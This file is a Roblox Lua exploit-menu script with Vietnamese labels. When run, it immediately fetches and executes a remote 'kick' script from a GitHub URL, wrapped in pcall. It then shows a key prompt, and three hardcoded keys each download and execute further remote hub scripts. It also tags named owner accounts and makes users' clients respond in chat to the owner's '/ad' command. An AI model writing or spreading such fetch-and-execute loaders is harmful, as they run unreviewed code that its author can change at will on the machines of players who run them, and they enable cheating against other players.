--// AUTO RUN KICK SCRIPT
pcall(function()
	loadstring(game:HttpGet(
	"https://raw.githubusercontent.com/doanhvu339-ux/Scriptkey/refs/heads/main/Kick"
	))()
end)

-------------------------------------------------
-- SERVICES
-------------------------------------------------
local Players = game:GetService("Players")
local UserInputService = game:GetService("UserInputService")
local TextChatService = game:GetService("TextChatService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")

local LocalPlayer = Players.LocalPlayer
local PlayerGui = LocalPlayer:WaitForChild("PlayerGui")

-------------------------------------------------
-- 👑 CONFIG ROLE
-------------------------------------------------
local OWNER_NAME = "ehfphvg362"

local DEPUTY_LIST = {
	["Yg242"] = true,
	["tranhu001"] = true
}

-------------------------------------------------
-- 👑 ROLE TAG
-------------------------------------------------
local function createTag(character,text,color)

	local head = character:WaitForChild("Head",5)
	if not head then return end

	if head:FindFirstChild("RoleTag") then
		head.RoleTag:Destroy()
	end

	local billboard = Instance.new("BillboardGui")
	billboard.Name = "RoleTag"
	billboard.Size = UDim2.new(0,100,0,22)
	billboard.StudsOffset = Vector3.new(0,2.5,0)
	billboard.AlwaysOnTop = true
	billboard.Parent = head

	local label = Instance.new("TextLabel")
	label.Size = UDim2.new(1,0,1,0)
	label.BackgroundTransparency = 1
	label.Text = text
	label.TextColor3 = color
	label.TextStrokeTransparency = 0
	label.Font = Enum.Font.GothamBold
	label.TextSize = 12
	label.Parent = billboard

end

local function setupRole(player)

	if player.Name == OWNER_NAME then

		local function apply(char)
			createTag(char," ",Color3.fromRGB(255,215,0))
		end

		if player.Character then apply(player.Character) end
		player.CharacterAdded:Connect(apply)

	elseif DEPUTY_LIST[player.Name] then

		local function apply(char)
			createTag(char,"PHÓ SCRIPT",Color3.fromRGB(255,240,120))
		end

		if player.Character then apply(player.Character) end
		player.CharacterAdded:Connect(apply)

	end

end

for _,p in ipairs(Players:GetPlayers()) do
	setupRole(p)
end
Players.PlayerAdded:Connect(setupRole)

-------------------------------------------------
-- 🔑 KEY SAVE / LOAD
-------------------------------------------------
local KEY_FILE = "bacon_key.txt"

local function saveKey(key)
	pcall(function()
		if writefile then
			writefile(KEY_FILE,key)
		end
	end)
end

local function loadKey()
	local saved
	pcall(function()
		if readfile and isfile and isfile(KEY_FILE) then
			saved = readfile(KEY_FILE)
		end
	end)
	return saved
end

-------------------------------------------------
-- 💬 SEND CHAT
-------------------------------------------------
local function sendChat(msg)

	if TextChatService.ChatVersion == Enum.ChatVersion.TextChatService then

		local channel = TextChatService.TextChannels.RBXGeneral
		channel:SendAsync(msg)

	else

		ReplicatedStorage
		.DefaultChatSystemChatEvents
		.SayMessageRequest
		:FireServer(msg,"All")

	end

end

-------------------------------------------------
-- 👀 WATCH OWNER CHAT
-------------------------------------------------
local function watchPlayer(player)

	if player.Name ~= OWNER_NAME then return end

	player.Chatted:Connect(function(message)

		if string.lower(message):find("/ad") then
			sendChat("/me")
		end

	end)

end

for _,p in pairs(Players:GetPlayers()) do
	watchPlayer(p)
end

Players.PlayerAdded:Connect(watchPlayer)

-------------------------------------------------
-- 🖥️ GUI KEY
-------------------------------------------------
local gui = Instance.new("ScreenGui",PlayerGui)
gui.Name = "MenuKey"
gui.ResetOnSpawn = false

local frame = Instance.new("Frame",gui)
frame.Size = UDim2.new(0,320,0,260)
frame.Position = UDim2.new(0.5,-160,0.5,-130)
frame.BackgroundColor3 = Color3.fromRGB(25,25,25)
frame.BorderSizePixel = 0
frame.Active = true
Instance.new("UICorner",frame).CornerRadius = UDim.new(0,14)

-------------------------------------------------
-- DRAG GUI
-------------------------------------------------
local dragging,dragStart,startPos

frame.InputBegan:Connect(function(input)

	if input.UserInputType == Enum.UserInputType.MouseButton1
	or input.UserInputType == Enum.UserInputType.Touch then

		dragging = true
		dragStart = input.Position
		startPos = frame.Position

		input.Changed:Connect(function()
			if input.UserInputState == Enum.UserInputState.End then
				dragging = false
			end
		end)

	end

end)

UserInputService.InputChanged:Connect(function(input)

	if dragging then

		local delta = input.Position - dragStart

		frame.Position = UDim2.new(
			startPos.X.Scale,
			startPos.X.Offset + delta.X,
			startPos.Y.Scale,
			startPos.Y.Offset + delta.Y
		)

	end

end)

-------------------------------------------------
-- TITLE
-------------------------------------------------
local title = Instance.new("TextLabel",frame)
title.Size = UDim2.new(1,0,0,40)
title.BackgroundTransparency = 1
title.Text = "🔑 MENU KEY"
title.TextColor3 = Color3.fromRGB(0,170,255)
title.Font = Enum.Font.GothamBold
title.TextSize = 18

-------------------------------------------------
-- KEY BOX
-------------------------------------------------
local box = Instance.new("TextBox",frame)
box.Size = UDim2.new(0.85,0,0,40)
box.Position = UDim2.new(0.075,0,0,70)
box.PlaceholderText = "Nhập key..."
box.Font = Enum.Font.Gotham
box.TextSize = 14
box.TextColor3 = Color3.new(1,1,1)
box.BackgroundColor3 = Color3.fromRGB(40,40,40)
Instance.new("UICorner",box)

local savedKey = loadKey()
if savedKey then
	box.Text = savedKey
end

-------------------------------------------------
-- CONFIRM BUTTON
-------------------------------------------------
local confirm = Instance.new("TextButton",frame)
confirm.Size = UDim2.new(0.6,0,0,40)
confirm.Position = UDim2.new(0.2,0,0,125)
confirm.Text = "XÁC NHẬN KEY"
confirm.Font = Enum.Font.GothamBold
confirm.TextSize = 14
confirm.TextColor3 = Color3.new(1,1,1)
confirm.BackgroundColor3 = Color3.fromRGB(0,120,255)
Instance.new("UICorner",confirm)

-------------------------------------------------
-- SAVE BUTTON
-------------------------------------------------
local saveBtn = Instance.new("TextButton",frame)
saveBtn.Size = UDim2.new(0.6,0,0,35)
saveBtn.Position = UDim2.new(0.2,0,0,175)
saveBtn.Text = "💾 LƯU KEY"
saveBtn.Font = Enum.Font.GothamBold
saveBtn.TextSize = 13
saveBtn.TextColor3 = Color3.new(1,1,1)
saveBtn.BackgroundColor3 = Color3.fromRGB(0,180,120)
Instance.new("UICorner",saveBtn)

-------------------------------------------------
-- STATUS
-------------------------------------------------
local status = Instance.new("TextLabel",frame)
status.Size = UDim2.new(1,0,0,30)
status.Position = UDim2.new(0,0,1,-30)
status.BackgroundTransparency = 1
status.Font = Enum.Font.Gotham
status.TextSize = 13
status.TextColor3 = Color3.new(1,1,1)

-------------------------------------------------
-- KEY CHECK
-------------------------------------------------
local function processKey(key)

	if key == "hay" then

		saveKey(key)

		loadstring(game:HttpGet(
		"https://raw.githubusercontent.com/doanhvu339-ux/viphub/refs/heads/main/Vippro"
		))()

		gui:Destroy()
		return true

	elseif key == "bobaconhub" then

		saveKey(key)

		loadstring(game:HttpGet(
		"https://raw.githubusercontent.com/doanhvu339-ux/baconpremium/refs/heads/main/inftro%20bobaconhub"
		))()

		gui:Destroy()
		return true

	elseif key == "vuhub2k12" then

		saveKey(key)

		loadstring(game:HttpGet(
		"https://raw.githubusercontent.com/vukk2k12-hub/vukk/refs/heads/main/vukkhub"
		))()

		gui:Destroy()
		return true

	end

	return false

end

-------------------------------------------------
-- BUTTON CLICK
-------------------------------------------------
confirm.MouseButton1Click:Connect(function()

	if not processKey(box.Text) then

		box.Text = ""
		status.Text = "❌ Key không đúng"
		status.TextColor3 = Color3.fromRGB(255,80,80)

	end

end)

saveBtn.MouseButton1Click:Connect(function()

	if box.Text ~= "" then

		saveKey(box.Text)

		status.Text = "✅ Đã lưu key!"
		status.TextColor3 = Color3.fromRGB(80,255,150)

	end

end)
